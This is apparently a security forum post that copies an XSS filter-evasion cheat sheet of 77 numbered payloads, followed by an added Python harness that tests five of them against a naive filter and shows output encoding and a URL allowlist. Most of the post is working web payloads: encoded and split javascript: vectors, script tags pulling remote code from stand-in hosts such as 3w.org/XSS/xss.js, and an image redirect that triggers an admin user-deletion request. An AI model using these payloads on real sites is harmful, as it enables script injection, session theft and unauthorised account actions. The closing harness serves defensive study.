It seems t00ls has fairly little material on XSS, so when I saw something good I copied it over; maybe some of you will want to bookmark it.
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (the semicolons are required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab to break up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab to break up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2 (null characters are essentially useless in China, since there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-18&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a letter is enough)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) ActionScript inside Flash can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
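Added example, not part of the original post or of the cheat sheet it copies: a small Python harness that shows why the keyword-stripping filters most of the vectors above are aimed at fail, and which two defences hold up. It takes five vectors from the list (items 4, 11, 18, 20 and 23) as constructed test input, runs them through a hypothetical naive filter (case-sensitive, single pass, two keywords), and checks with a normalising detector whether a script marker survives. It then shows context-appropriate output encoding for the HTML text and attribute contexts (html.escape from the standard library) and a scheme allowlist for attributes that carry a URL, which is the only thing that helps against the javascript: and scheme-relative tricks of items 68 to 77. The function names and the naive filter are my own.

```python
import html
import re
from typing import Dict, Optional
from urllib.parse import urlparse

# Constructed test input: five vectors copied from the list above. Each one
# is built to beat a keyword-stripping filter in a particular way.
VECTORS: Dict[str, str] = {
    "mixed_case": "<IMG SRC=JaVaScRiPt:alert('XSS')>",                       # item (4)
    "tab_split":  "<IMG SRC=\"jav\tascript:alert('XSS');\">",                # item (11)
    "null_byte":  "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>",                     # item (18)
    "slash_attr": "<SCRIPT/XSS SRC=\"http://3w.org/XSS/xss.js\"></SCRIPT>",  # item (20)
    "double_lt":  "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",                    # item (23)
}


def naive_filter(s: str) -> str:
    """Hypothetical blacklist of the kind these vectors were written against:
    case-sensitive, single pass, two keywords."""
    return s.replace("<script", "").replace("javascript:", "")


_CONTROLS = re.compile(r"[\x00-\x20]")             # NUL, tab, CR, LF, space, other C0 controls
_MARKER = re.compile(r"<script|javascript:", re.I)


def normalize(markup: str) -> str:
    """Canonicalise roughly the way a browser will before it tokenises:
    drop control characters and whitespace inside tokens, ignore case."""
    return _CONTROLS.sub("", markup).lower()


def still_executable(markup: str) -> bool:
    """Detector used for the check: does a script marker survive once the
    markup is normalised? A filter that matches before normalising misses it."""
    return _MARKER.search(normalize(markup)) is not None


def encode_for_html(s: str) -> str:
    """Output encoding for the HTML text and quoted-attribute contexts.
    <, >, &, " and ' become entities, so the data can never open a tag."""
    return html.escape(s, quote=True)


def safe_href(url: str) -> Optional[str]:
    """Allowlist for attributes that carry a URL (A HREF, IMG SRC, ...), where
    encoding alone does not help because a javascript: URL is valid attribute
    text. Control characters are removed first so a split scheme like
    'jav<TAB>ascript:' cannot hide; only http and https with a host are
    accepted, which also rejects the scheme-relative '//host' form of item
    (74). The host itself is not validated, so the IP-obfuscation tricks of
    items (70)-(76) still need a separate host check."""
    cleaned = re.sub(r"[\x00-\x1f]", "", url).strip()
    parsed = urlparse(cleaned)           # urlparse lower-cases the scheme for us
    if parsed.scheme in ("http", "https") and parsed.netloc:
        return cleaned
    return None


def evaluate() -> Dict[str, Dict[str, bool]]:
    """For every vector: does the naive filter let it through, and does
    output encoding leave any raw '<' that could start a tag?"""
    report: Dict[str, Dict[str, bool]] = {}
    for name, vector in VECTORS.items():
        report[name] = {
            "naive_filter_bypassed": still_executable(naive_filter(vector)),
            "encoding_leaves_raw_lt": "<" in encode_for_html(vector),
        }
    return report


if __name__ == "__main__":
    for name, result in evaluate().items():
        print(f"{name:12s} bypasses naive filter: {result['naive_filter_bypassed']}, "
              f"raw '<' after encoding: {result['encoding_leaves_raw_lt']}")
    for candidate in ["http://www.google.com./", "JaVaScRiPt:alert('XSS')",
                      "jav\tascript:alert('XSS')", "//www.google.com/"]:
        print(f"safe_href({candidate!r}) -> {safe_href(candidate)!r}")
```

Every one of the five vectors passes the naive filter untouched yet still carries a script marker after normalisation, while none of them contains a raw `<` after encoding; the same normalise-then-match step is what a detection rule needs before it can match on the raw request. The lesson is the one the whole list illustrates: reject-listing strings is a losing game, and the durable fix is encoding for the exact output context plus an allowlist for the cases (URLs, CSS, script blocks) where encoding alone is not enough.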
Original source: http://fuzzexp.org/u/0day/?p=14